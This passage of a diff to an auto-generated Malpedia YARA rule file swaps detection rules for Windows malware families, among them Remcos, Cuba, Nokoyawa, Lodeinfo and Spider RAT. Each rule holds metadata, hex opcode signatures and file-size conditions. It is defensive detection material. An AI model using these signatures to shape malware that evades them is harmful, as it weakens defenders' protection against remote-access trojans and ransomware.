+		$sequence_25 = { ff75f4 ff75ec ffd7 56 53 }
+		$sequence_26 = { 7505 83c8ff c9 c3 8b400c 8b00 }
+		$sequence_27 = { 8d043e 50 e8???????? 037dfc 8d45d8 }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 1998848
 }
-rule MALPEDIA_Win_Alma_Communicator_Auto : FILE
+rule MALPEDIA_Win_Lodeinfo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d8b295a7-7b28-5e6b-b5af-98c76d267598"
+		id = "fef4135b-c37b-592e-9b9c-4313e3ff89af"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alma_communicator_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lodeinfo_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "904bfc03a43918532b57223d9b7b36661a7e5069ea789e70ed097e9455614910"
+		logic_hash = "e42d005c217ef3b217f52a6115c139a42c70e499d47cac23508862c48ef328f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128421,32 +128808,32 @@ rule MALPEDIA_Win_Alma_Communicator_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f802 7509 80bdfdfdffff3a 7429 }
-		$sequence_1 = { 89442414 8bf1 8b4c2424 85c9 }
-		$sequence_2 = { 8bca 8d542424 83e103 f3a4 8b4c2414 6a01 }
-		$sequence_3 = { 8b4508 dd00 ebc6 c745e018514100 e9???????? c745e020514100 }
-		$sequence_4 = { 59 59 eb14 6a10 68???????? }
-		$sequence_5 = { 47 84c0 75f8 be???????? 8d85fcfbffff 68ff010000 50 }
-		$sequence_6 = { ba???????? 8901 66a1???????? 51 66894104 }
-		$sequence_7 = { 0f4ecb 8bd9 7fe6 8bfe 8d4f01 }
-		$sequence_8 = { c6840508faffff00 33c9 8a840d08faffff 88840d20f6ffff }
-		$sequence_9 = { 53 56 33f6 8955f8 8bd9 57 }
+		$sequence_0 = { 898300010000 8b8558ffffff c7837001000000000000 e9???????? ba???????? 8bcf e8???????? }
+		$sequence_1 = { 75a8 8b55e4 8b7d14 8b4508 3bcf 0f84440a0000 }
+		$sequence_2 = { 3bf2 743f 50 ffb548ffffff 51 8b8d5cffffff 8bd1 }
+		$sequence_3 = { 7534 0fb64e04 0fbec3 3bc8 7529 0fb64e05 }
+		$sequence_4 = { 8be5 5d c3 83f806 754d 837e0408 8b4d14 }
+		$sequence_5 = { 0f8586000000 8d4ffc 034d08 e8???????? 8b1b 33ff 89450c }
+		$sequence_6 = { 8955d4 8d1418 8b45fc 8955d8 3b5008 7641 8b4008 }
+		$sequence_7 = { e8???????? 84c0 0f8481000000 83fe09 0f8592020000 8bb554ffffff }
+		$sequence_8 = { 024df4 8b45c4 880c30 8bc3 0fb64dfc 2bc1 99 }
+		$sequence_9 = { e8???????? ff75bc e8???????? ff75c0 e8???????? ff75cc }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 712704
 }
-rule MALPEDIA_Win_Fakerean_Auto : FILE
+rule MALPEDIA_Win_Unidentified_115_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "34f4a458-02de-570d-b3a3-0e20f22e1220"
+		id = "be30f947-2ea3-5dbe-8a22-d2eff226f388"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fakerean_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_115"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_115_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "ff26cea37ee30849e01ae5f84110a8c6d04e7d37a0c5e0d9f3ae27ca67cdd4d9"
+		logic_hash = "0dce5979f7403c0c98c10384045967ec938948f605faa1b9ed353ecbedbd1370"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128460,32 +128847,32 @@ rule MALPEDIA_Win_Fakerean_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 6a07 05???????? 59 ba30f8ffff }
-		$sequence_1 = { ab ab ab ab 6a08 59 }
-		$sequence_2 = { ff37 ff15???????? ff45fc 837dfc04 7cb7 53 ff15???????? }
-		$sequence_3 = { 8d45e4 50 6a00 56 ff15???????? }
-		$sequence_4 = { 742c 8b11 33db 83f81b 0f95c3 8d5c1b02 53 }
-		$sequence_5 = { 52 50 53 51 e8???????? 3bd7 }
-		$sequence_6 = { 83c11a ffb48ef0000000 50 ff15???????? 33c0 399e88040000 }
-		$sequence_7 = { 83c40c 83f801 7419 57 6a3c 68???????? e8???????? }
-		$sequence_8 = { c9 c21c00 55 8bec 53 56 8b7510 }
-		$sequence_9 = { ff33 ff15???????? 56 ff33 ff15???????? 897df8 8b45f0 }
+		$sequence_0 = { e8???????? b9c8af0000 e8???????? ba01000000 488d0dd4090100 e8???????? 488b05???????? }
+		$sequence_1 = { e8???????? 31c0 eb0e 803c0100 7408 48ffc0 e9???????? }
+		$sequence_2 = { 488915???????? 488905???????? 488905???????? 4c891d???????? 4c8d1deda40100 c605????????01 48c705????????00000000 }
+		$sequence_3 = { 4589c8 4521d4 01dd 41c1c802 8d1c2a 4489ca c1ca0d }
+		$sequence_4 = { 4529d8 488d541010 41ffd2 85c0 0f8490000000 486384249c000000 }
+		$sequence_5 = { 0fc8 8944240c 89442450 8b4224 897c2434 0fc8 }
+		$sequence_6 = { 7f1a 4080fe20 7e22 490fa3f6 731c 400fbed6 4889c1 }
+		$sequence_7 = { 31ff 4885c9 7403 488b39 488d5910 31f6 4531e4 }
+		$sequence_8 = { 488b0b e8???????? 488b4b08 4889442428 e8???????? 488b15???????? 488b0f }
+		$sequence_9 = { 4155 4154 57 56 53 4883ec28 31ff }
 
 	condition:
-		7 of them and filesize < 4071424
+		7 of them and filesize < 648192
 }
-rule MALPEDIA_Win_Unidentified_039_Auto : FILE
+rule MALPEDIA_Win_Cova_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff352829-d1d0-5849-83ea-58866912f4d1"
+		id = "fa07deb6-c177-5206-9d19-f63251440ec2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_039_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cova"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cova_auto.yar#L1-L110"
 		license_url = "N/A"
-		logic_hash = "d0fe8cc6956cba73b2a7ff7165daeebd2de9ab47240a59740a19b016e98dc584"
+		logic_hash = "d5e67f28620dc0f740b402e9f8384fb0d05494020e9e1fdf2531ffdb1df92592"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128499,71 +128886,71 @@ rule MALPEDIA_Win_Unidentified_039_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75f6 2bc2 d1f8 0f8596feffff c74534d66e0000 c74524a6290000 c74530f12a0000 }
-		$sequence_1 = { c745ec0d6a0000 c745e8cc1a0000 c745f065350000 c745e4cc020000 c745e0f4170000 c745dc92210000 83c0a6 }
-		$sequence_2 = { 23c1 8945f8 8b450c 8b4df4 3bc8 }
-		$sequence_3 = { 57 8b85b0070000 c74594c92f0000 c745982b7d0000 c745a080210000 c74590043b0000 c7458422170000 }
-		$sequence_4 = { 8b45f0 0bc8 894de4 8b45f4 }
-		$sequence_5 = { 23c1 8b4d9c 23c1 8b4d98 }
-		$sequence_6 = { 8b4d0c 3bc8 7d0f ff7508 ff75f4 ff15???????? 89450c }
-		$sequence_7 = { c745ec0d0a0000 8b45ec b99bc3ffff 2bc8 034df0 8b45fc 8b55e8 }
-		$sequence_8 = { 33c8 894de0 8b45ec 8b4df0 3bc8 7c0a 53 }
-		$sequence_9 = { 8b4528 05cf7b0000 33c8 894d2c 8b4530 }
+		$sequence_0 = { 488d7b58 be06000000 488d0525670000 483947f0 }
+		$sequence_1 = { 488d0509820000 483bf8 740e 833f00 }
+		$sequence_2 = { 7526 4c8d25bb610000 493bdc 7408 488bcb e8???????? }
+		$sequence_3 = { 4288840120a90000 ffc2 ebe1 897c2420 }
+		$sequence_4 = { ff5778 488bd8 4885c0 741f ba20bf0200 488bc8 }
+		$sequence_5 = { 488d15a4300000 41b810200100 488bcd e8???????? }
+		$sequence_6 = { 7528 48833d????????00 741e 488d0d09b30000 }
+		$sequence_7 = { 488d15564a0000 488d0d374a0000 e8???????? 85c0 755a }
+		$sequence_8 = { 410fb601 48c1e804 8a440438 8841ff 490fbe01 }
+		$sequence_9 = { 8b0a 4803cf 33c0 eb0c }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 123904
 }
-rule MALPEDIA_Win_Cerbu_Miner_Auto : FILE
+rule MALPEDIA_Win_Spider_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "77652d6a-745f-5552-8901-83bf555706f4"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cerbu_miner_auto.yar#L1-L134"
+		id = "a31996a5-e3ca-592f-95bc-8fa380f84c48"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spider_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spider_rat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "e4927a587588bc11053fcbade5bb9500364c9a656d383eb318cc8486464f3cce"
+		logic_hash = "a5e11d471849c9a1ee46ff091a234f4718c14598ff1efe77b39f8fba97b05619"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 88b42480000000 eb3f 83e902 7433 83e904 7413 83e909 }
-		$sequence_1 = { 7412 48 8d0d0b360500 48 83c428 48 ff25???????? }
-		$sequence_2 = { 8d4601 c643012e 48 63c8 41 8d4602 48 }
-		$sequence_3 = { 85d2 7427 85c9 b800040000 41 b800080000 44 }
-		$sequence_4 = { f6473801 7402 eb18 48 8bcf ff15???????? f6473801 }
-		$sequence_5 = { e9???????? 45 8bfd 44 89ad50010000 e9???????? 44 }
-		$sequence_6 = { 48 89442420 e8???????? 48 8bd7 48 8bcb }
-		$sequence_7 = { 89b42418010000 8b74242c 83feff 7515 837f0c00 7c0f 48 }
-		$sequence_8 = { 8d057b52f9ff 48 894518 c745b0e6070000 48 c745c000000200 48 }
-		$sequence_9 = { 44 2bc0 44 8903 33c0 48 8b5c2438 }
+		$sequence_0 = { 4c8d0513ca0600 83e21f 486bd258 490314c8 488d0d414b0600 eb11 488d0d384b0600 }
+		$sequence_1 = { 48898424d0000000 488bc2 488bf9 488364242800 488d2d2bc80100 48896c2420 }
+		$sequence_2 = { 488d8c2480000000 e8???????? 90 4c8d842448010000 488bd0 488d8c24d0000000 e8???????? }
+		$sequence_3 = { 0fbe1401 488d1c01 488d0db7b30500 4d8bc1 e8???????? 4885c0 752e }
+		$sequence_4 = { 8bd7 e8???????? 90 4889442450 488d15d3c50200 488d4c2450 }
+		$sequence_5 = { 488b8b48020000 4c8d8c24d0040000 488d9424d0000000 4183c8ff 896c2420 ff15???????? 85c0 }
+		$sequence_6 = { 4885db 74f1 488b02 488364243800 4c8d442438 488d154f380200 498bc9 }
+		$sequence_7 = { 488d2df4890500 e9???????? bf58000000 488bd7 448d67a9 498bcc e8???????? }
+		$sequence_8 = { 53 4883ec30 48c7442420feffffff 488bd9 488d05df650300 488901 }
+		$sequence_9 = { 740d 4183e5fd 488bcb ff15???????? 4084ed 0f85da000000 488b8c24a8000000 }
 
 	condition:
-		7 of them and filesize < 1040384
+		7 of them and filesize < 1107968
 }
-rule MALPEDIA_Win_Pirpi_Auto : FILE
+rule MALPEDIA_Win_Nozelesn_Decryptor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "87b6b6f2-e4ed-52ab-9d18-a97a5c488a2f"
+		id = "a50249a6-41ed-5afd-a344-f1c46141fa9b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pirpi_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nozelesn_decryptor_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "ac2a9b729be997048deec428ae0fd8035f83f34266d3bcf665ee32e11696cc21"
+		logic_hash = "4edccdad4171a3a8dbbdabb59b2b49ff95bfdb30e97dda2b954d7aea22da3283"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128577,32 +128964,32 @@ rule MALPEDIA_Win_Pirpi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894504 e9???????? 8b4c2414 8d442424 50 51 e8???????? }
-		$sequence_1 = { c7470402000000 c744241000000000 8b442414 85c0 7407 50 ff15???????? }
-		$sequence_2 = { ff15???????? 6a01 8d4c244c c68424e400000002 ff15???????? 8b44243c 3bc6 }
-		$sequence_3 = { f7d1 c1e207 49 8d7c0220 8bd1 c1e902 f3a5 }
-		$sequence_4 = { 81c444010000 c3 8b842454010000 85c0 7406 c70000000000 }
-		$sequence_5 = { 5b 81c400010000 c20400 33c9 83f804 0f95c1 49 }
-		$sequence_6 = { 56 50 ffd3 25ff000000 8bcf 50 }
-		$sequence_7 = { 8d0c37 83c603 f7e9 8b45f0 8bca c1e91f 03d1 }
-		$sequence_8 = { 3bc2 7404 33c2 8901 8b442458 83c104 }
-		$sequence_9 = { 55 50 8bce e8???????? 85c0 0f84ad000000 }
+		$sequence_0 = { e8???????? 33c0 83c40c 668945a8 c645fc02 8d7da4 837db808 }
+		$sequence_1 = { 8997c4010000 89b7c8010000 8bcf 8987cc010000 8d45f8 50 }
+		$sequence_2 = { 6a50 50 83fa10 c645fc01 8d8558ffffff 8d75c0 0f4375c0 }
+		$sequence_3 = { a1???????? 33c4 89442464 56 57 8b7d08 8d442410 }
+		$sequence_4 = { 8bd3 0b45e8 23c8 33ce 33f9 8b45e8 0bd0 }
+		$sequence_5 = { 2bc2 53 83f805 7c1b ff75f0 0fb701 50 }
+		$sequence_6 = { 8a45ef 0fb6f0 eb58 8d45ef 3945cc 8d45d4 757f }
+		$sequence_7 = { 8b5df4 8bc1 8b75ec c1e007 33d0 c1cb05 33d6 }
+		$sequence_8 = { 6a0c 8d4704 50 8d4604 50 56 8d4df8 }
+		$sequence_9 = { 8d8d18fdffff e8???????? 8d8d78fdffff e8???????? c745fcffffffff 8b95dcfdffff 83fa08 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 1122304
 }
-rule MALPEDIA_Win_Remcos_Auto : FILE
+rule MALPEDIA_Win_Mewsei_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a82de676-3cc8-5fb4-a200-4d5a92641294"
+		id = "584cb11c-0c0a-56b4-a94f-bac12775ad8c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.remcos_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mewsei_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "a7cd1a6ac531bf59ce4eeb2a4df184c30ea794355d77ce56d9d521351da0d837"
+		logic_hash = "ee5e42e21ccf04345d72bb9f3d49fdb8dd733d6140538e230075cf58e7ebb4a5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128616,32 +129003,32 @@ rule MALPEDIA_Win_Remcos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 50 ff15???????? 8d45f0 33f6 50 }
-		$sequence_1 = { ff15???????? 85c0 7410 6a00 ff35???????? }
-		$sequence_2 = { 50 ff15???????? 8d45f0 33f6 50 }
-		$sequence_3 = { ff35???????? ff15???????? 85c0 7410 6a00 }
-		$sequence_4 = { 8d45f8 50 ff15???????? ff7508 }
-		$sequence_5 = { 6a09 ff35???????? ff15???????? ff35???????? ff15???????? }
-		$sequence_6 = { 7508 ff15???????? 33c0 5f }
-		$sequence_7 = { 50 ff15???????? 8d45f0 33f6 }
-		$sequence_8 = { ab ab e8???????? 52 50 }
-		$sequence_9 = { 50 6a28 ff15???????? 50 ff15???????? 8d45f0 33f6 }
+		$sequence_0 = { 7409 50 e8???????? 83c404 46 3bf3 72eb }
+		$sequence_1 = { 895df4 8b5dfc 8dbc1f4239faff 8b5df4 }
+		$sequence_2 = { c1e810 33d2 25ff7f0000 f7f1 80c230 }
+		$sequence_3 = { ffd6 a1???????? 85c0 7405 6aff }
+		$sequence_4 = { 0bf3 0fb65804 c1e608 0bf3 8b5df8 33df 235dfc }
+		$sequence_5 = { 8b7df8 337df4 8b5df0 237dfc 337df8 037de0 8dbc1f2ac68747 }
+		$sequence_6 = { 85c0 750c 6a01 e8???????? 83c404 ebe7 894610 }
+		$sequence_7 = { 0fb6581c 0bfb 897974 897de8 8b7df0 }
+		$sequence_8 = { 03de 8dbc3b44eabea4 8b5df4 c1c704 03fb 897dfc 8b7df8 }
+		$sequence_9 = { 8bf8 897df8 c70300000000 8d7701 8d4900 56 e8???????? }
 
 	condition:
-		7 of them and filesize < 1054720
+		7 of them and filesize < 504832
 }
-rule MALPEDIA_Win_Nokoyawa_Auto : FILE
+rule MALPEDIA_Win_Linseningsvr_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "41b1b168-b0ea-5f04-84cd-fd90bfa48e03"
+		id = "9dcd591f-d0ec-5190-8dad-c6b3b9eab825"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nokoyawa_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.linseningsvr_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "a5e2c231f7d7eec8e19a418805bfeaea862c56b36ec030240db4e6a8dee84747"
+		logic_hash = "0cfff1e97d9fd891165604e0b9cd757922199a1abb3f822338fa50a684f756d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128655,32 +129042,32 @@ rule MALPEDIA_Win_Nokoyawa_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883e1c0 488b542470 488d4c0a20 488b542470 4883c220 4889542440 448bc0 }
-		$sequence_1 = { c744246820000000 c744246c6b000000 c744242000000000 eb0b 8b442420 83c014 }
-		$sequence_2 = { 890424 8b0424 d1e0 8b0c24 c1e91f 0bc1 89442474 }
-		$sequence_3 = { c1e902 0bc1 8944240c 33c0 85c0 0f853effffff b804000000 }
-		$sequence_4 = { 488b442408 48ffc0 4889442408 0fb60424 83f861 7c0a 0fb60424 }
-		$sequence_5 = { c1e91f 0bc1 89842450010000 b804000000 486bc00a 8b8c2450010000 }
-		$sequence_6 = { 0bc1 89442410 33c0 85c0 0f853cffffff b804000000 486bc005 }
-		$sequence_7 = { c744242000000000 4c8b0d???????? 4c8d058f030000 33d2 }
-		$sequence_8 = { 33c0 85c0 0f8528ffffff b804000000 486bc008 }
-		$sequence_9 = { e9???????? 0fb6442421 85c0 7419 8b442424 33c9 488b542438 }
+		$sequence_0 = { 8d34b558874000 832600 83c60c 4a 75f7 8b00 8b35???????? }
+		$sequence_1 = { 47 3bfe 7ce7 68???????? e8???????? 8b15???????? b900010000 }
+		$sequence_2 = { 83f908 7229 f3a5 ff2495982c4000 8bc7 ba03000000 }
+		$sequence_3 = { e8???????? b900010000 33c0 8dbc2450040000 55 }
+		$sequence_4 = { 8d3c8dc08d4000 c1e603 8b0f f644310401 7456 50 e8???????? }
+		$sequence_5 = { 7c13 80fb78 7f0e 0fbec3 8a801c714000 }
+		$sequence_6 = { 52 56 66895c2448 6689442456 ff15???????? 8bd8 }
+		$sequence_7 = { 8944241c 33ff 8bc8 83f940 5d }
+		$sequence_8 = { 8088818c400008 40 3dff000000 72f1 56 }
+		$sequence_9 = { 8ac8 80c120 8888808b4000 eb1f 83f861 7213 83f87a }
 
 	condition:
-		7 of them and filesize < 92160
+		7 of them and filesize < 81360
 }
-rule MALPEDIA_Win_Cuba_Auto : FILE
+rule MALPEDIA_Win_Wscspl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3602e8da-452a-5ed9-9344-c7f4379dda1d"
+		id = "d7761c27-1c76-50ce-a49d-adbb7174eed5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cuba_auto.yar#L1-L160"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wscspl_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "7c1547f930142355cbe84e5424404f219fb1f83bf4df86f3c7d2bdf36e965b58"
+		logic_hash = "1b757c1efc9452507637d1df12d4e19d7f55d5ea9e93d3fda8eef85d6e83088d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128694,38 +129081,32 @@ rule MALPEDIA_Win_Cuba_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0019 43 41 00444341 }
-		$sequence_1 = { 0026 43 41 00b043410062 }
-		$sequence_2 = { 3914c5e89b4100 7408 40 83f81d 7cf1 }
-		$sequence_3 = { a1???????? 33c5 8945fc e8???????? 84c0 0f854d010000 }
-		$sequence_4 = { 000d???????? 384100 b538 41 }
-		$sequence_5 = { 8d85fcfeffff 898df8fdffff 50 6a01 53 ff15???????? ffb5fcfeffff }
-		$sequence_6 = { 03b1e0b14100 8bc3 03b40dfcfeffff 03b5ecfeffff }
-		$sequence_7 = { 8985bcf9ffff 83cfff 33c0 c785c0f9ffff2c020000 668985ecfbffff 668985f4fdffff 8d85c0f9ffff }
-		$sequence_8 = { 3385ecfeffff 0bcb 03f0 238df4feffff 8b85e0feffff 03b40508ffffff 03b0ecb14100 }
-		$sequence_9 = { c745e008934100 e9???????? c745e010934100 e9???????? c745e018934100 }
-		$sequence_10 = { 0026 45 41 003a }
-		$sequence_11 = { e8???????? 8bf8 b900010000 8d85f8fdffff 89bdbcfbffff }
-		$sequence_12 = { 000c43 41 0035???????? 43 }
-		$sequence_13 = { 003a 45 41 004245 }
-		$sequence_14 = { 0012 45 41 0026 }
-		$sequence_15 = { 000446 41 00d1 45 }
+		$sequence_0 = { e8???????? 8d442428 50 885c342c }
+		$sequence_1 = { 8d541804 0fb60a 0fb62e 2bcd 7527 83ff01 7634 }
+		$sequence_2 = { 687c230000 8bd3 68c60b0000 bb???????? e8???????? 83c408 }
+		$sequence_3 = { e8???????? 83c41c 5f 5e c705????????83230000 5d 8b8c2488230000 }
+		$sequence_4 = { 2bc6 a3???????? ff15???????? a1???????? 83f8ff 7419 6a00 }
+		$sequence_5 = { 8d842484020000 50 8d8c3480010000 51 }
+		$sequence_6 = { 06 1007 1010 0809 100a 1010 100b }
+		$sequence_7 = { 52 ff15???????? 83f8ff 7536 ff15???????? 8bf0 a1???????? }
+		$sequence_8 = { a3???????? e8???????? 8b0d???????? 8b3d???????? 51 8bf0 57 }
+		$sequence_9 = { 687c230000 8d44240c 6a01 50 ff15???????? 687c230000 68c10b0000 }
 
 	condition:
-		7 of them and filesize < 1094656
+		7 of them and filesize < 901120
 }
-rule MALPEDIA_Win_Xsplus_Auto : FILE
+rule MALPEDIA_Win_Newpass_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2c89d099-29a9-55d4-a949-65dd1bdfe6eb"
+		id = "1259b84e-f22e-5be6-af9b-9be76f957f31"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xsplus_auto.yar#L1-L179"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newpass"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.newpass_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "e49d0b0e4b6b18be179499d3f98b92cb7a2ea53651dc18e80a64f9c221a6561b"
+		logic_hash = "348cb83a48a4b33ccc0bbb52d51d9d135a00878f03abb1cd8978354d39a99336"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128739,39 +129120,32 @@ rule MALPEDIA_Win_Xsplus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4608 8b7e20 8b36 66394f18 75f2 }
-		$sequence_1 = { 51 6801000080 ff15???????? 85c0 7529 8b5518 52 }
-		$sequence_2 = { 6a40 0020 6b40008a 46 }
-		$sequence_3 = { 8b8da4feffff 51 6a00 ff15???????? }
-		$sequence_4 = { 52 ff15???????? 6a2e 8d85f8feffff 50 }
-		$sequence_5 = { a1???????? c705????????04264000 8935???????? a3???????? ff15???????? a3???????? 83f8ff }
-		$sequence_6 = { 837dc400 7505 8b45e0 eb63 }
-		$sequence_7 = { 7453 83bdb8fdffff10 7436 e9???????? 81bdb8fdffff11010000 }
-		$sequence_8 = { 8945dc 6a05 8b45dc 50 }
-		$sequence_9 = { e9???????? 8975e4 33c0 39b810a84000 0f8491000000 }
-		$sequence_10 = { a1???????? a3???????? a1???????? c705????????04264000 8935???????? }
-		$sequence_11 = { ff75e4 ffd3 8986fc010000 897e70 c686c800000043 c6864b01000043 c74668e0a34000 }
-		$sequence_12 = { 3945e0 7608 8b45e0 e9???????? c685f8feffff00 b918000000 33c0 }
-		$sequence_13 = { 8bec 83ec2c c745d406000000 6a00 6a00 6809100000 }
-		$sequence_14 = { 51 8b55fc 8b02 8b4dfc 51 ff500c }
-		$sequence_15 = { ff15???????? 83c40c 8d95fcfeffff 52 ff15???????? 6a00 6880000000 }
-		$sequence_16 = { 8b8d90feffff 51 e8???????? 83c404 b801000000 eb02 }
+		$sequence_0 = { ffc2 48ffc1 83fa0a 72dc c605????????00 488b5dc8 488d55b8 }
+		$sequence_1 = { 498b0f e8???????? 49c747180f000000 4d896f10 41c60700 498bc4 }
+		$sequence_2 = { 0fb705???????? 48c7455807000000 48895d50 66895d40 6685c0 7505 }
+		$sequence_3 = { 83c2c9 eb25 80e961 80f905 7705 83c2a9 }
+		$sequence_4 = { 49d1e8 483bc8 4c0f47c2 4d85c0 744a 482bf9 0fb7041f }
